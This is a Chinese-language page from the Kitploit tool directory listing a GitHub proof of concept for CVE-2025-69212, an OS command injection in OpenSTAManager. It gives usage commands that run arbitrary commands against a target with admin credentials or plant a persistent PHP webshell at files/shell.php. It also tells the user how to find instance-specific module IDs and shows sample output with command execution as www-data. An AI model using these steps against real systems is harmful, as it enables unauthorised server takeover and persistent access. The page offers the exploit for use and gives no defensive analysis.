Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-69212-PoC — CVE-2025-69212 - OpenSTAManager 操作系统命令注入 PoC | Kitploit
工具/GitHubGitHub/alaeddine03/cve-2025-69212-poc
Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubalaeddine03/cve-2025-69212-poc

CVE-2025-69212-PoC

CVE-2025-69212 - OpenSTAManager 操作系统命令注入 PoC

查看仓库
482个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-69212 - OpenSTAManager 操作系统命令注入 PoC

用法

安装依赖:

root@kitploit:~
pip install -r requirements.txt

运行单条命令并打印其输出:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'

改为植入持久化 PHP WebShell:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell

选项

Flag描述
-u, --url目标实例的基础 URL
-U, --username用于认证的用户名
-P, --password用于认证的密码
-c, --command要执行的命令,输出保存到 pwn_out.txt
--shell在 files/shell.php 处植入 PHP WebShell,而不是运行单条命令
--id-module发票导入功能的模块 ID(默认:14)
--id-plugin发票导入功能的插件 ID(默认:48)

id_module 和 id_plugin 是实例特有的。如果默认值不起作用,请登录目标的 Web 界面,导航到电子发票导入功能,并在浏览器的网络标签页中检查请求参数。

示例输出

root@kitploit:~
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
下载工具